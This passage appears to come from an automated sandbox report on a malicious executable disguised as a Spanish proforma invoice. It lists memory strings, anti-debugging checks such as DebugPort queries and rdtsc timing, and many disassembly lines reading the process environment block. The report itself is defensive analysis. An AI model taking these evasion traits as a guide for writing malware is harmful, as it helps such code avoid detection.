Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84315348037.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006569000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006569000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RAVCpl64.exe, 00000003.00000002.88172888199.000000000068C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\rasphone.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\rasphone.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 2_2_36771763 rdtsc

2_2_36771763

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 0_2_00401F03 LdrInitializeThunk,ShowWindow,EnableWindow,

0_2_00401F03

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 0_2_707E1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_707E1BFF

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36730670 mov eax, dword ptr fs:[00000030h]		2_2_36730670
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772670 mov eax, dword ptr fs:[00000030h]		2_2_36772670
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36772670 mov eax, dword ptr fs:[00000030h]		2_2_36772670
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36727662 mov eax, dword ptr fs:[00000030h]		2_2_36727662
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36727662 mov eax, dword ptr fs:[00000030h]		2_2_36727662
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36727662 mov eax, dword ptr fs:[00000030h]		2_2_36727662
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36743660 mov eax, dword ptr fs:[00000030h]		2_2_36743660
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36743660 mov eax, dword ptr fs:[00000030h]		2_2_36743660
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36743660 mov eax, dword ptr fs:[00000030h]		2_2_36743660
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B166E mov eax, dword ptr fs:[00000030h]		2_2_367B166E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B166E mov eax, dword ptr fs:[00000030h]		2_2_367B166E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B166E mov eax, dword ptr fs:[00000030h]		2_2_367B166E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676666D mov esi, dword ptr fs:[00000030h]		2_2_3676666D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676666D mov eax, dword ptr fs:[00000030h]		2_2_3676666D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676666D mov eax, dword ptr fs:[00000030h]		2_2_3676666D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36765654 mov eax, dword ptr fs:[00000030h]		2_2_36765654
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673965A mov eax, dword ptr fs:[00000030h]		2_2_3673965A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673965A mov eax, dword ptr fs:[00000030h]		2_2_3673965A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676265C mov eax, dword ptr fs:[00000030h]		2_2_3676265C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676265C mov ecx, dword ptr fs:[00000030h]		2_2_3676265C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676265C mov eax, dword ptr fs:[00000030h]		2_2_3676265C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36733640 mov eax, dword ptr fs:[00000030h]		2_2_36733640
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674F640 mov eax, dword ptr fs:[00000030h]		2_2_3674F640
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674F640 mov eax, dword ptr fs:[00000030h]		2_2_3674F640
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674F640 mov eax, dword ptr fs:[00000030h]		2_2_3674F640
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676C640 mov eax, dword ptr fs:[00000030h]		2_2_3676C640
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676C640 mov eax, dword ptr fs:[00000030h]		2_2_3676C640
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672D64A mov eax, dword ptr fs:[00000030h]		2_2_3672D64A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672D64A mov eax, dword ptr fs:[00000030h]		2_2_3672D64A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36730630 mov eax, dword ptr fs:[00000030h]		2_2_36730630
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36760630 mov eax, dword ptr fs:[00000030h]		2_2_36760630
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B8633 mov esi, dword ptr fs:[00000030h]		2_2_367B8633
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B8633 mov eax, dword ptr fs:[00000030h]		2_2_367B8633
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B8633 mov eax, dword ptr fs:[00000030h]		2_2_367B8633
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676F63F mov eax, dword ptr fs:[00000030h]		2_2_3676F63F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676F63F mov eax, dword ptr fs:[00000030h]		2_2_3676F63F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36737623 mov eax, dword ptr fs:[00000030h]		2_2_36737623
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DD62C mov ecx, dword ptr fs:[00000030h]		2_2_367DD62C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DD62C mov ecx, dword ptr fs:[00000030h]		2_2_367DD62C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DD62C mov eax, dword ptr fs:[00000030h]		2_2_367DD62C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36735622 mov eax, dword ptr fs:[00000030h]		2_2_36735622
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36735622 mov eax, dword ptr fs:[00000030h]		2_2_36735622
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676C620 mov eax, dword ptr fs:[00000030h]		2_2_3676C620
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]		2_2_367C3608
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]		2_2_367C3608
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]		2_2_367C3608
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]		2_2_367C3608
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]		2_2_367C3608
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367C3608 mov eax, dword ptr fs:[00000030h]		2_2_367C3608
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675D600 mov eax, dword ptr fs:[00000030h]		2_2_3675D600
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675D600 mov eax, dword ptr fs:[00000030h]		2_2_3675D600
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EF607 mov eax, dword ptr fs:[00000030h]		2_2_367EF607
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676360F mov eax, dword ptr fs:[00000030h]		2_2_3676360F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36804600 mov eax, dword ptr fs:[00000030h]		2_2_36804600
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AC6F2 mov eax, dword ptr fs:[00000030h]		2_2_367AC6F2
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AC6F2 mov eax, dword ptr fs:[00000030h]		2_2_367AC6F2
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367296E0 mov eax, dword ptr fs:[00000030h]		2_2_367296E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367296E0 mov eax, dword ptr fs:[00000030h]		2_2_367296E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673C6E0 mov eax, dword ptr fs:[00000030h]		2_2_3673C6E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367356E0 mov eax, dword ptr fs:[00000030h]		2_2_367356E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367356E0 mov eax, dword ptr fs:[00000030h]		2_2_367356E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367356E0 mov eax, dword ptr fs:[00000030h]		2_2_367356E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367566E0 mov eax, dword ptr fs:[00000030h]		2_2_367566E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367566E0 mov eax, dword ptr fs:[00000030h]		2_2_367566E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675D6D0 mov eax, dword ptr fs:[00000030h]		2_2_3675D6D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367306CF mov eax, dword ptr fs:[00000030h]		2_2_367306CF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FA6C0 mov eax, dword ptr fs:[00000030h]		2_2_367FA6C0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367D86C2 mov eax, dword ptr fs:[00000030h]		2_2_367D86C2
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F86A8 mov eax, dword ptr fs:[00000030h]		2_2_367F86A8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F86A8 mov eax, dword ptr fs:[00000030h]		2_2_367F86A8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36738690 mov eax, dword ptr fs:[00000030h]		2_2_36738690
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AD69D mov eax, dword ptr fs:[00000030h]		2_2_367AD69D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367BC691 mov eax, dword ptr fs:[00000030h]		2_2_367BC691
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EF68C mov eax, dword ptr fs:[00000030h]		2_2_367EF68C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680 mov eax, dword ptr fs:[00000030h]		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3680B781 mov eax, dword ptr fs:[00000030h]		2_2_3680B781
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3680B781 mov eax, dword ptr fs:[00000030h]		2_2_3680B781
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36760774 mov eax, dword ptr fs:[00000030h]		2_2_36760774
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36734779 mov eax, dword ptr fs:[00000030h]		2_2_36734779
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36734779 mov eax, dword ptr fs:[00000030h]		2_2_36734779
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36742760 mov ecx, dword ptr fs:[00000030h]		2_2_36742760
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]		2_2_36771763
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]		2_2_36771763
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]		2_2_36771763
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]		2_2_36771763
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]		2_2_36771763
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36771763 mov eax, dword ptr fs:[00000030h]		2_2_36771763
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]		2_2_36752755
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]		2_2_36752755
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]		2_2_36752755
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36752755 mov ecx, dword ptr fs:[00000030h]		2_2_36752755
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]		2_2_36752755
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36752755 mov eax, dword ptr fs:[00000030h]		2_2_36752755
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676A750 mov eax, dword ptr fs:[00000030h]		2_2_3676A750
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]		2_2_3672F75B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]		2_2_3672F75B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]		2_2_3672F75B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]		2_2_3672F75B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]		2_2_3672F75B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]		2_2_3672F75B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]		2_2_3672F75B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]		2_2_3672F75B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F75B mov eax, dword ptr fs:[00000030h]		2_2_3672F75B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DE750 mov eax, dword ptr fs:[00000030h]		2_2_367DE750
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B174B mov eax, dword ptr fs:[00000030h]		2_2_367B174B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B174B mov ecx, dword ptr fs:[00000030h]		2_2_367B174B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36763740 mov eax, dword ptr fs:[00000030h]		2_2_36763740
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676174A mov eax, dword ptr fs:[00000030h]		2_2_3676174A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_368017BC mov eax, dword ptr fs:[00000030h]		2_2_368017BC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36759723 mov eax, dword ptr fs:[00000030h]		2_2_36759723
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673471B mov eax, dword ptr fs:[00000030h]		2_2_3673471B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673471B mov eax, dword ptr fs:[00000030h]		2_2_3673471B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EF717 mov eax, dword ptr fs:[00000030h]		2_2_367EF717
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673D700 mov ecx, dword ptr fs:[00000030h]		2_2_3673D700
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F970B mov eax, dword ptr fs:[00000030h]		2_2_367F970B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F970B mov eax, dword ptr fs:[00000030h]		2_2_367F970B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]		2_2_3672B705
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]		2_2_3672B705
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]		2_2_3672B705
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672B705 mov eax, dword ptr fs:[00000030h]		2_2_3672B705
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675270D mov eax, dword ptr fs:[00000030h]		2_2_3675270D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675270D mov eax, dword ptr fs:[00000030h]		2_2_3675270D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675270D mov eax, dword ptr fs:[00000030h]		2_2_3675270D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367377F9 mov eax, dword ptr fs:[00000030h]		2_2_367377F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367377F9 mov eax, dword ptr fs:[00000030h]		2_2_367377F9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675E7E0 mov eax, dword ptr fs:[00000030h]		2_2_3675E7E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]		2_2_367337E4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]		2_2_367337E4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]		2_2_367337E4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]		2_2_367337E4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]		2_2_367337E4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]		2_2_367337E4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367337E4 mov eax, dword ptr fs:[00000030h]		2_2_367337E4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EF7CF mov eax, dword ptr fs:[00000030h]		2_2_367EF7CF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367307A7 mov eax, dword ptr fs:[00000030h]		2_2_367307A7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FD7A7 mov eax, dword ptr fs:[00000030h]		2_2_367FD7A7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FD7A7 mov eax, dword ptr fs:[00000030h]		2_2_367FD7A7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FD7A7 mov eax, dword ptr fs:[00000030h]		2_2_367FD7A7
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36761796 mov eax, dword ptr fs:[00000030h]		2_2_36761796
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36761796 mov eax, dword ptr fs:[00000030h]		2_2_36761796
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]		2_2_367AE79D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]		2_2_367AE79D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]		2_2_367AE79D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]		2_2_367AE79D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]		2_2_367AE79D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]		2_2_367AE79D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]		2_2_367AE79D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]		2_2_367AE79D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AE79D mov eax, dword ptr fs:[00000030h]		2_2_367AE79D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36738470 mov eax, dword ptr fs:[00000030h]		2_2_36738470
